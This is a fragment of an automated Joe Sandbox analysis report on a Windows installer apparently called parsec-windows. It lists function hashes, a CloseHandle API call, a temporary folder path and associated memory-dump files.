                              • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                              • Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
                              • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                              • Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98
                              Function 00403B12 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 11COMMON
                              Download Yara Rule
                              APIs
                              • CloseHandle.KERNEL32(FFFFFFFF,00403A5E,?), ref: 00403B1D
                              Strings
                              • C:\Users\user\AppData\Local\Temp\nsj258A.tmp\, xrefs: 00403B31
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2494211679.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000D.00000002.2494185786.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494242114.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494510338.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_parsec-windows.jbxd
                              Similarity
                              • API ID: CloseHandle
                              • String ID: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\
                              • API String ID: 2962429428-3659257028
                              • Opcode ID: e86ec88962d2cddd060eb64ec5e150871475ae72b9f2b14f7d4b77a190cc5563
                              • Instruction ID: 74b342ff74dc5917d60848dc34610585f5de2c5243f802b65b47dd8438b48b4d
                              • Opcode Fuzzy Hash: e86ec88962d2cddd060eb64ec5e150871475ae72b9f2b14f7d4b77a190cc5563
                              • Instruction Fuzzy Hash: 5EC0123050470056D1646F749E4FE153B64AB4073EB600325B0F9B10F1CB3C5759895D